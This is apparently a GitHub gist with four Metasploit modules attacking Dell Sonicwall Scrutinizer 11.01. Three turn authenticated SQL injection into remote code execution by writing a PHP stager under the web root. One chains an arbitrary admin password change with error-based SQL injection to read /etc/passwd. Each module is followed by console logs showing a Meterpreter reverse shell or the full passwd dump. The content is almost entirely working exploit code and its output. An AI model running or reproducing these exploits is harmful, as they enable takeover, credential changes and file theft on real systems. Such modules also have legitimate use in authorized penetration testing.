Forked from brandonprry/scrutinizer_changeunit_sqli_exec.rb
Created
July 10, 2014 17:17
# This module requires Metasploit: http://metasploit.com/download | |
## | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
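class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  # Web-served directory the SQL injection writes the PHP stager into. This is
  # the Linux appliance layout; a Windows target would only need a different
  # path here (the injection itself is unchanged).
  WEBROOT_D4D = '/home/plixer/scrutinizer/html/d4d'.freeze

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Dell Sonicwall Scrutinizer 11.01 Authenticated Code Execution',
      'Description'    => %q{
        Dell Sonicwall Scrutinizer 11.01 is vulnerable to an authenticated SQL injection that allows
        an attacker to write arbitrary files to the file system. This vulnerability is used
        to write a PHP script to the file system to gain RCE.
        This was tested on the Dell Scrutinizer appliance available to download on mysonicwall.com
      },
      'License'        => MSF_LICENSE,
      'Author'         => [],
      'References'     => [],
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Dell Sonicwall Scrutinizer 11.01', {}]],
      'Privileged'     => false,
      'DisclosureDate' => '',
      'DefaultTarget'  => 0))

    # The injection is only reachable with a valid session, so credentials are
    # mandatory rather than optional.
    register_options(
      [
        OptString.new('TARGETURI', [true, 'Base Application path', '/']),
        OptString.new('USERNAME', [true, 'The username to authenticate as']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with'])
      ], self.class)
  end

  # Authenticates against cgi-bin/login.cgi and returns [userid, sessionid].
  #
  # The application takes the credentials as GET parameters, so they end up in
  # the target's access log and any intermediate proxy log. Aborts the module
  # when the server does not answer or the response carries no session.
  def login
    res = send_request_cgi(
      'uri'      => normalize_uri(target_uri.path, 'cgi-bin', 'login.cgi'),
      'vars_get' => {
        'name' => datastore['USERNAME'],
        'pwd'  => datastore['PASSWORD']
      }
    )
    fail_with(Failure::Unreachable, 'No response from login.cgi') unless res

    match = res.body.to_s.match(/"userid":"([^"]*)","sessionid":"([^"]*)"/)
    fail_with(Failure::NoAccess, 'Login failed - check USERNAME and PASSWORD') unless match
    fail_with(Failure::UnexpectedReply, 'Login response carried an empty session id') if match[2].empty?

    [match[1], match[2]]
  end

  def exploit
    userid, sessionid = login
    cookie = "cookiesenabled=1;sessionid=#{sessionid};userid=#{userid}"

    # The stager travels as a hex literal so MySQL consumes it without quoting.
    php_hex = "<?php #{payload.encoded} ?>".unpack('H*').first
    # Keyed on the fresh session id: INTO OUTFILE will not overwrite an
    # existing file, so the name must be new on every run.
    shell_path = "#{WEBROOT_D4D}/#{sessionid}.php"

    # Injection point is the user_id POST parameter of d4d/exporters.php. The
    # query is forced to return one row and its line terminator is set to the
    # PHP stager, so INTO OUTFILE lands the stager under the web root.
    form = {
      'ti'         => 1,
      'limit'      => 25,
      'page'       => 0,
      'order'      => '',
      'dir'        => 'DESC',
      'bbp'        => 'percent',
      'changeUnit' => '',
      'user_id'    => "-9513 OR 9319=9319 LIMIT 0,1 INTO OUTFILE '#{shell_path}' LINES TERMINATED BY 0x#{php_hex}"
    }

    # NOTE(review): the file is created by mysqld, not the web server; cleanup
    # runs through the payload (web-server user) and presumably only succeeds
    # if that user may unlink files in WEBROOT_D4D - verify on the target.
    register_files_for_cleanup(shell_path)

    print_status("Writing PHP stager to #{shell_path} via SQL injection")
    res = send_request_cgi(
      'uri'       => normalize_uri(target_uri.path, 'd4d', 'exporters.php'),
      'method'    => 'POST',
      'vars_post' => form,
      'cookie'    => cookie
    )
    fail_with(Failure::Unreachable, 'No response from exporters.php') unless res

    print_status("Requesting #{sessionid}.php to execute the payload")
    send_request_cgi('uri' => normalize_uri(target_uri.path, 'd4d', "#{sessionid}.php"))
  end
end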
__END__ | |
msf exploit(scrutinizer_sqli_exec) > show options | |
Module options (exploit/dell/scrutinizer/scrutinizer_sqli_exec): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- | |
PASSWORD passw0rd! no The password to authenticate with | |
Proxies no Use a proxy chain | |
RHOST 192.168.1.99 yes The target address | |
RPORT 80 yes The target port | |
TARGETURI / yes Base Application path | |
USERNAME username no The username to authenticate as | |
VHOST no HTTP server virtual host | |
Exploit target: | |
Id Name | |
-- ---- | |
0 Dell Sonicwall Scrutinizer 11.01 | |
msf exploit(scrutinizer_sqli_exec) > exploit | |
[*] Started reverse handler on 192.168.1.31:4444 | |
[*] Sending stage (39195 bytes) to 192.168.1.99 | |
[*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.99:38133) at 2014-02-15 09:33:34 -0600 | |
meterpreter > shell | |
Process 3038 created. | |
Channel 0 created. | |
id | |
uid=48(apache) gid=48(apache) groups=48(apache),500(plixer) | |
uname -a | |
Linux fdsafdsafdsa 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux | |
# This module requires Metasploit: http://metasploit.com/download | |
## | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
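class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  # Web-served directory the SQL injection writes the PHP stager into. This is
  # the Linux appliance layout; a Windows target would only need a different
  # path here (the injection itself is unchanged).
  WEBROOT_D4D = '/home/plixer/scrutinizer/html/d4d'.freeze

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Dell Sonicwall Scrutinizer 11.01 Authenticated Code Execution',
      'Description'    => %q{
        Dell Sonicwall Scrutinizer 11.01 is vulnerable to an authenticated SQL injection that allows
        an attacker to write arbitrary files to the file system. This vulnerability is used
        to write a PHP script to the file system to gain RCE.
        This was tested on the Dell Scrutinizer appliance available to download on mysonicwall.com
      },
      'License'        => MSF_LICENSE,
      'Author'         => [],
      'References'     => [],
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Dell Sonicwall Scrutinizer 11.01', {}]],
      'Privileged'     => false,
      'DisclosureDate' => '',
      'DefaultTarget'  => 0))

    # The injection is only reachable with a valid session, so credentials are
    # mandatory rather than optional.
    register_options(
      [
        OptString.new('TARGETURI', [true, 'Base Application path', '/']),
        OptString.new('USERNAME', [true, 'The username to authenticate as']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with'])
      ], self.class)
  end

  # Authenticates against cgi-bin/login.cgi and returns [userid, sessionid].
  #
  # The application takes the credentials as GET parameters, so they end up in
  # the target's access log and any intermediate proxy log. Aborts the module
  # when the server does not answer or the response carries no session.
  def login
    res = send_request_cgi(
      'uri'      => normalize_uri(target_uri.path, 'cgi-bin', 'login.cgi'),
      'vars_get' => {
        'name' => datastore['USERNAME'],
        'pwd'  => datastore['PASSWORD']
      }
    )
    fail_with(Failure::Unreachable, 'No response from login.cgi') unless res

    match = res.body.to_s.match(/"userid":"([^"]*)","sessionid":"([^"]*)"/)
    fail_with(Failure::NoAccess, 'Login failed - check USERNAME and PASSWORD') unless match
    fail_with(Failure::UnexpectedReply, 'Login response carried an empty session id') if match[2].empty?

    [match[1], match[2]]
  end

  def exploit
    userid, sessionid = login
    cookie = "cookiesenabled=1;sessionid=#{sessionid};userid=#{userid}"

    # The stager travels as a hex literal so MySQL consumes it without quoting.
    php_hex = "<?php #{payload.encoded} ?>".unpack('H*').first
    # Keyed on the fresh session id: INTO DUMPFILE will not overwrite an
    # existing file, so the name must be new on every run.
    shell_path = "#{WEBROOT_D4D}/#{sessionid}.php"

    # Injection point is the methodDetail GET parameter of d4d/exporters.php:
    # a 20-column UNION places the stager in column 4 and INTO DUMPFILE writes
    # that single value verbatim under the web root. Because this goes in the
    # query string, a very large payload may exceed the server's URL limit.
    injection = "-6045 UNION ALL SELECT NULL,NULL,NULL,0x#{php_hex},NULL,NULL,NULL," \
                'NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ' \
                "INTO DUMPFILE '#{shell_path}'#"

    # NOTE(review): the file is created by mysqld, not the web server; cleanup
    # runs through the payload (web-server user) and presumably only succeeds
    # if that user may unlink files in WEBROOT_D4D - verify on the target.
    register_files_for_cleanup(shell_path)

    print_status("Writing PHP stager to #{shell_path} via SQL injection")
    res = send_request_cgi(
      'uri'      => normalize_uri(target_uri.path, 'd4d', 'exporters.php'),
      'vars_get' => { 'methodDetail' => injection },
      'cookie'   => cookie
    )
    fail_with(Failure::Unreachable, 'No response from exporters.php') unless res

    print_status("Requesting #{sessionid}.php to execute the payload")
    send_request_cgi('uri' => normalize_uri(target_uri.path, 'd4d', "#{sessionid}.php"))
  end
end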
__END__ | |
msf exploit(scrutinizer_sqli_exec) > show options | |
Module options (exploit/dell/scrutinizer/scrutinizer_sqli_exec): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- | |
PASSWORD passw0rd! no The password to authenticate with | |
Proxies no Use a proxy chain | |
RHOST 192.168.1.99 yes The target address | |
RPORT 80 yes The target port | |
TARGETURI / yes Base Application path | |
USERNAME username no The username to authenticate as | |
VHOST no HTTP server virtual host | |
Exploit target: | |
Id Name | |
-- ---- | |
0 Dell Sonicwall Scrutinizer 11.01 | |
msf exploit(scrutinizer_sqli_exec) > exploit | |
[*] Started reverse handler on 192.168.1.31:4444 | |
[*] Sending stage (39195 bytes) to 192.168.1.99 | |
[*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.99:38133) at 2014-02-15 09:33:34 -0600 | |
meterpreter > shell | |
Process 3038 created. | |
Channel 0 created. | |
id | |
uid=48(apache) gid=48(apache) groups=48(apache),500(plixer) | |
uname -a | |
Linux fdsafdsafdsa 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux | |
# This module requires Metasploit: http://metasploit.com/download | |
## | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
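class Metasploit3 < Msf::Auxiliary
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Hex-encoded markers ('qkkqq' / 'qzzuq') wrapped around each leaked chunk so
  # it can be picked out of the MySQL duplicate-entry error text.
  MARKER_PRE  = '0x716b6b7171'.freeze
  MARKER_POST = '0x717a7a7571'.freeze
  # Hex characters recovered per request. Keep it small: the chunk plus both
  # markers has to survive inside the truncated error message.
  CHUNK_HEX = 50

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Dell Sonicwall Scrutinizer Authenticated Arbitrary User Password Change and File Read',
      'Description'    => %q{
        Dell Sonicwall Scrutinizer 11.01 is vulnerable to an arbitrary user password change vuln
        and a SQL injection as an admin user during account creation allows for the reading
        of arbitrary files.
        This module exploits both vulns to go from a user with lesser privileges to changing
        the admin user's password, then logging in as admin to exploit the SQLi and read
        an arbitrary specified file. Tested on a CentOS box, should work on windows as well.
        Note that this module is destructive: the target user's password is replaced with
        NEWPASSWORD and the original cannot be restored.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [],
      'References'     => [],
      'Targets'        => [['Dell Sonicwall Scrutinizer 11.01', {}]],
      'Privileged'     => false,
      'DisclosureDate' => '',
      'DefaultTarget'  => 0))

    # FILENAME is optional (an empty value skips the file read); the old
    # 'false' string was truthy and made it required by accident.
    register_options(
      [
        OptString.new('FILENAME', [false, 'The file to read from the admin sqli', '/etc/passwd']),
        OptString.new('TARGETURI', [true, 'Base Application path', '/']),
        OptString.new('USERNAME', [true, 'The username to authenticate as']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with']),
        OptString.new('NEWPASSWORD', [true, 'The password to set on USERID', 'passw0rd!']),
        OptInt.new('USERID', [true, "The ID of the user to have their password changed. 'admin' is always 1.", 1])
      ], self.class)
  end

  # Logs in as username/password via cgi-bin/login.cgi and returns the cookie
  # string for that session. The application takes the credentials as GET
  # parameters, so they end up in the target's access log. Aborts the run when
  # the server does not answer or the credentials are rejected.
  def session_cookie(username, password)
    res = send_request_cgi(
      'uri'      => normalize_uri(target_uri.path, 'cgi-bin', 'login.cgi'),
      'vars_get' => { 'name' => username, 'pwd' => password }
    )
    fail_with(Msf::Exploit::Failure::Unreachable, 'No response from login.cgi') unless res

    match = res.body.to_s.match(/"userid":"([^"]*)","sessionid":"([^"]*)"/)
    fail_with(Msf::Exploit::Failure::NoAccess, "Login as '#{username}' failed - check the credentials") unless match

    "cookiesenabled=1; sessionid=#{match[2]}; userid=#{match[1]}"
  end

  # Submits the user-preferences form for user_id with savePass set. The
  # application accepts this from a lesser-privileged session, which is the
  # password-change vulnerability. A 500 is treated as rejection.
  def change_password(cookie, user_id, new_password)
    form = {
      'tool'            => 'userprefs',
      'savePrefs'       => user_id,
      'othersTop'       => 'true',
      'graphType'       => 'step',
      'hostDisplayType' => 'DNS',
      'language'        => 'english',
      'skin'            => 'retro-sonicwall',
      'unit'            => 'percent',
      'tab'             => 'tab1',
      'defaultMap'      => '0',
      'flowTopn'        => '10',
      'statusOption'    => 'conversations',
      'email'           => 'undefined',
      'interval'        => '1m',
      'ibOb'            => 'inbound',
      'srcDst'          => 'src',
      'alarmsTopn'      => '50',
      'statusTopn'      => '25',
      'statusRefresh'   => '5',
      'statusViewDeflt' => 'topInterfaces',
      'defMailRep'      => 'esoTopConversationsCount',
      'Timezone'        => 'Automatic',
      'savePass'        => new_password,
      'useLdap'         => '0',
      'defFlowalyzRep'  => 'availability',
      'readonly'        => '0'
    }
    res = send_request_cgi(
      'uri'       => normalize_uri(target_uri.path, 'cgi-bin', 'admin.cgi'),
      'method'    => 'POST',
      'vars_post' => form,
      'cookie'    => cookie
    )
    fail_with(Msf::Exploit::Failure::Unreachable, 'No response from admin.cgi') unless res
    return unless res.code == 500

    fail_with(Msf::Exploit::Failure::NoAccess, "Error updating user's password. Check your credentials")
  end

  # One round of the error-based injection in the selectedUserGroup field of
  # the admin account-creation form. The hex of LOAD_FILE(file_hex) is sliced
  # from offset (1-based) for CHUNK_HEX characters and surfaced between the
  # markers in a duplicate-key error. Returns the text between the markers, or
  # nil when the response does not contain them.
  def read_chunk(cookie, file_hex, offset)
    query = '2 AND (SELECT 3835 FROM(SELECT COUNT(*),CONCAT(' \
            "#{MARKER_PRE},(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{file_hex})) AS CHAR),0x20))," \
            "#{offset},#{CHUNK_HEX})),#{MARKER_POST},FLOOR(RAND(0)*2))x " \
            'FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'
    res = send_request_cgi(
      'uri'       => normalize_uri(target_uri.path, 'cgi-bin', 'admin.cgi'),
      'method'    => 'POST',
      'vars_post' => {
        'tool'              => 'userprefs',
        # Dummy account details; the query errors out before any user is created.
        'newUser'           => 'fdsafdsa',
        'pwd'               => 'passw0rd!',
        'selectedUserGroup' => query
      },
      'cookie' => cookie
    )
    fail_with(Msf::Exploit::Failure::Unreachable, 'No response from admin.cgi') unless res

    match = res.body.to_s.match(/qkkqq(.*?)qzzuq1/)
    match && match[1]
  end

  # Reads FILENAME through the admin session CHUNK_HEX hex characters at a
  # time and returns the decoded bytes collected so far (empty on failure).
  def read_file(cookie, filename)
    file_hex = filename.unpack('H*').first
    chunks = []
    offset = 1

    loop do
      hex = read_chunk(cookie, file_hex, offset)
      if hex.nil?
        print_error('Marker not found in the response; the injection did not fire') if chunks.empty?
        break
      end
      # MID() past the end of the data yields '' - normal end of file.
      break if hex.empty?
      # The IFNULL fallback (a single space) means LOAD_FILE() returned NULL:
      # the file is missing/unreadable or the DB account lacks FILE privilege.
      unless hex =~ /\A[0-9a-fA-F]+\z/
        print_error("LOAD_FILE returned NULL for #{filename} (missing, unreadable, or no FILE privilege)")
        break
      end

      chunk = [hex].pack('H*')
      chunks << chunk
      print_good("#{chunks.size}. #{chunk}")
      offset += CHUNK_HEX
    end

    chunks.join
  end

  def run
    new_password = datastore['NEWPASSWORD']
    cookie = session_cookie(datastore['USERNAME'], datastore['PASSWORD'])
    change_password(cookie, datastore['USERID'], new_password)
    print_good("Log in with the user's name and the password '#{new_password}'")

    # The file read needs the admin account, which is user id 1.
    filename = datastore['FILENAME'].to_s
    return unless datastore['USERID'].to_i == 1 && !filename.empty?

    print_good("Attempting to read file using 'admin' account: #{filename}")
    admin_cookie = session_cookie('admin', new_password)
    print_good(read_file(admin_cookie, filename))
  end
end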
__END__ | |
msf auxiliary(scrutinizer_password_change) > show options | |
Module options (auxiliary/gather/scrutinizer_password_change): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- | |
FILENAME /etc/passwd yes The file to read from the admin sqli | |
PASSWORD passw0rd! no The password to authenticate with | |
Proxies no Use a proxy chain | |
RHOST 192.168.1.99 yes The target address | |
RPORT 80 yes The target port | |
TARGETURI / yes Base Application path | |
USERID 1 yes The ID of the user to have their password changed. 'admin' is always 1. | |
USERNAME username no The username to authenticate as | |
VHOST no HTTP server virtual host | |
msf auxiliary(scrutinizer_password_change) > run | |
[+] Log in with the user's name and the password 'passw0rd!' | |
[+] Attempting to read file using 'admin' account: /etc/passwd | |
[+] 1. root:x:0:0:root:/root:/bi | |
[+] 2. n/bash | |
bin:x:1:1:bin:/bin | |
[+] 3. :/sbin/nologin | |
daemon:x:2 | |
[+] 4. :2:daemon:/sbin:/sbin/nol | |
[+] 5. ogin | |
adm:x:3:4:adm:/var/a | |
[+] 6. dm:/sbin/nologin | |
lp:x:4:7 | |
[+] 7. :lp:/var/spool/lpd:/sbin/ | |
[+] 8. nologin | |
sync:x:5:0:sync:/ | |
[+] 9. sbin:/bin/sync | |
shutdown:x | |
[+] 10. :6:0:shutdown:/sbin:/sbin | |
[+] 11. /shutdown | |
halt:x:7:0:halt | |
[+] 12. :/sbin:/sbin/halt | |
mail:x: | |
[+] 13. 8:12:mail:/var/spool/mail | |
[+] 14. :/sbin/nologin | |
uucp:x:10: | |
[+] 15. 14:uucp:/var/spool/uucp:/ | |
[+] 16. sbin/nologin | |
operator:x:1 | |
[+] 17. 1:0:operator:/root:/sbin/ | |
[+] 18. nologin | |
games:x:12:100:ga | |
[+] 19. mes:/usr/games:/sbin/nolo | |
[+] 20. gin | |
gopher:x:13:30:gopher | |
[+] 21. :/var/gopher:/sbin/nologi | |
[+] 22. n | |
ftp:x:14:50:FTP User:/v | |
[+] 23. ar/ftp:/sbin/nologin | |
nobo | |
[+] 24. dy:x:99:99:Nobody:/:/sbin | |
[+] 25. /nologin | |
vcsa:x:69:69:vir | |
[+] 26. tual console memory owner | |
[+] 27. :/dev:/sbin/nologin | |
rpc:x | |
[+] 28. :32:32:Rpcbind Daemon:/va | |
[+] 29. r/cache/rpcbind:/sbin/nol | |
[+] 30. ogin | |
rpcuser:x:29:29:RPC | |
[+] 31. Service User:/var/lib/nfs | |
[+] 32. :/sbin/nologin | |
nfsnobody: | |
[+] 33. x:65534:65534:Anonymous N | |
[+] 34. FS User:/var/lib/nfs:/sbi | |
[+] 35. n/nologin | |
sshd:x:74:74:Pr | |
[+] 36. ivilege-separated SSH:/va | |
[+] 37. r/empty/sshd:/sbin/nologi | |
[+] 38. n | |
plixer:x:500:500::/home | |
[+] 39. /plixer:/bin/bash | |
ntp:x:3 | |
[+] 40. 8:38::/etc/ntp:/sbin/nolo | |
[+] 41. gin | |
dbus:x:81:81:System m | |
[+] 42. essage bus:/:/sbin/nologi | |
[+] 43. n | |
haldaemon:x:68:68:HAL d | |
[+] 44. aemon:/:/sbin/nologin | |
apa | |
[+] 45. che:x:48:48:Apache:/var/w | |
[+] 46. ww:/sbin/nologin | |
rtkit:x: | |
[+] 47. 499:498:RealtimeKit:/proc | |
[+] 48. :/sbin/nologin | |
pulse:x:49 | |
[+] 49. 8:497:PulseAudio System D | |
[+] 50. aemon:/var/run/pulse:/sbi | |
[+] 51. n/nologin | |
mysql:x:27:27:M | |
[+] 52. ySQL Server:/var/lib/mysq | |
[+] 53. l:/bin/bash | |
tcpdump:x:72: | |
[+] 54. 72::/:/sbin/nologin | |
[+] root:x:0:0:root:/root:/bin/bash | |
bin:x:1:1:bin:/bin:/sbin/nologin | |
daemon:x:2:2:daemon:/sbin:/sbin/nologin | |
adm:x:3:4:adm:/var/adm:/sbin/nologin | |
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin | |
sync:x:5:0:sync:/sbin:/bin/sync | |
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown | |
halt:x:7:0:halt:/sbin:/sbin/halt | |
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin | |
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin | |
operator:x:11:0:operator:/root:/sbin/nologin | |
games:x:12:100:games:/usr/games:/sbin/nologin | |
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin | |
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin | |
nobody:x:99:99:Nobody:/:/sbin/nologin | |
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin | |
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin | |
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin | |
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin | |
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin | |
plixer:x:500:500::/home/plixer:/bin/bash | |
ntp:x:38:38::/etc/ntp:/sbin/nologin | |
dbus:x:81:81:System message bus:/:/sbin/nologin | |
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin | |
apache:x:48:48:Apache:/var/www:/sbin/nologin | |
rtkit:x:499:498:RealtimeKit:/proc:/sbin/nologin | |
pulse:x:498:497:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin | |
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash | |
tcpdump:x:72:72::/:/sbin/nologin | |
[*] Auxiliary module execution completed | |
msf auxiliary(scrutinizer_password_change) > | |
# This module requires Metasploit: http://metasploit.com/download | |
## | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
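class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  # Web-served directory the SQL injection writes the PHP stager into. This is
  # the Linux appliance layout; a Windows target would only need a different
  # path here (the injection itself is unchanged).
  WEBROOT_D4D = '/home/plixer/scrutinizer/html/d4d'.freeze

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Dell Sonicwall Scrutinizer 11.01 Authenticated Code Execution',
      'Description'    => %q{
        Dell Sonicwall Scrutinizer 11.01 is vulnerable to an authenticated SQL injection that allows
        an attacker to write arbitrary files to the file system. This vulnerability is used
        to write a PHP script to the file system to gain RCE.
        This was tested on the Dell Scrutinizer appliance available to download on mysonicwall.com
      },
      'License'        => MSF_LICENSE,
      'Author'         => [],
      'References'     => [],
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Dell Sonicwall Scrutinizer 11.01', {}]],
      'Privileged'     => false,
      'DisclosureDate' => '',
      'DefaultTarget'  => 0))

    # The injection is only reachable with a valid session, so credentials are
    # mandatory rather than optional.
    register_options(
      [
        OptString.new('TARGETURI', [true, 'Base Application path', '/']),
        OptString.new('USERNAME', [true, 'The username to authenticate as']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with'])
      ], self.class)
  end

  # Authenticates against cgi-bin/login.cgi and returns [userid, sessionid].
  #
  # The application takes the credentials as GET parameters, so they end up in
  # the target's access log and any intermediate proxy log. Aborts the module
  # when the server does not answer or the response carries no session.
  def login
    res = send_request_cgi(
      'uri'      => normalize_uri(target_uri.path, 'cgi-bin', 'login.cgi'),
      'vars_get' => {
        'name' => datastore['USERNAME'],
        'pwd'  => datastore['PASSWORD']
      }
    )
    fail_with(Failure::Unreachable, 'No response from login.cgi') unless res

    match = res.body.to_s.match(/"userid":"([^"]*)","sessionid":"([^"]*)"/)
    fail_with(Failure::NoAccess, 'Login failed - check USERNAME and PASSWORD') unless match
    fail_with(Failure::UnexpectedReply, 'Login response carried an empty session id') if match[2].empty?

    [match[1], match[2]]
  end

  def exploit
    userid, sessionid = login
    cookie = "cookiesenabled=1;sessionid=#{sessionid};userid=#{userid}"

    # The stager travels as a hex literal so MySQL consumes it without quoting.
    php_hex = "<?php #{payload.encoded} ?>".unpack('H*').first
    # Keyed on the fresh session id: INTO DUMPFILE will not overwrite an
    # existing file, so the name must be new on every run.
    shell_path = "#{WEBROOT_D4D}/#{sessionid}.php"

    # Injection point is the xcNetworkDetail GET parameter of d4d/exporters.php:
    # a 4-column UNION places the stager in column 2 and INTO DUMPFILE writes
    # that single value verbatim under the web root. Because this goes in the
    # query string, a very large payload may exceed the server's URL limit.
    injection = "-7230 UNION ALL SELECT NULL,0x#{php_hex},NULL,NULL INTO DUMPFILE '#{shell_path}'#"

    # NOTE(review): the file is created by mysqld, not the web server; cleanup
    # runs through the payload (web-server user) and presumably only succeeds
    # if that user may unlink files in WEBROOT_D4D - verify on the target.
    register_files_for_cleanup(shell_path)

    print_status("Writing PHP stager to #{shell_path} via SQL injection")
    res = send_request_cgi(
      'uri'      => normalize_uri(target_uri.path, 'd4d', 'exporters.php'),
      'vars_get' => { 'xcNetworkDetail' => injection },
      'cookie'   => cookie
    )
    fail_with(Failure::Unreachable, 'No response from exporters.php') unless res

    print_status("Requesting #{sessionid}.php to execute the payload")
    send_request_cgi('uri' => normalize_uri(target_uri.path, 'd4d', "#{sessionid}.php"))
  end
end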
__END__ | |
msf exploit(scrutinizer_sqli_exec) > show options | |
Module options (exploit/dell/scrutinizer/scrutinizer_sqli_exec): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- | |
PASSWORD passw0rd! no The password to authenticate with | |
Proxies no Use a proxy chain | |
RHOST 192.168.1.99 yes The target address | |
RPORT 80 yes The target port | |
TARGETURI / yes Base Application path | |
USERNAME username no The username to authenticate as | |
VHOST no HTTP server virtual host | |
Exploit target: | |
Id Name | |
-- ---- | |
0 Dell Sonicwall Scrutinizer 11.01 | |
msf exploit(scrutinizer_sqli_exec) > exploit | |
[*] Started reverse handler on 192.168.1.31:4444 | |
[*] Sending stage (39195 bytes) to 192.168.1.99 | |
[*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.99:38133) at 2014-02-15 09:33:34 -0600 | |
meterpreter > shell | |
Process 3038 created. | |
Channel 0 created. | |
id | |
uid=48(apache) gid=48(apache) groups=48(apache),500(plixer) | |
uname -a | |
Linux fdsafdsafdsa 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux | |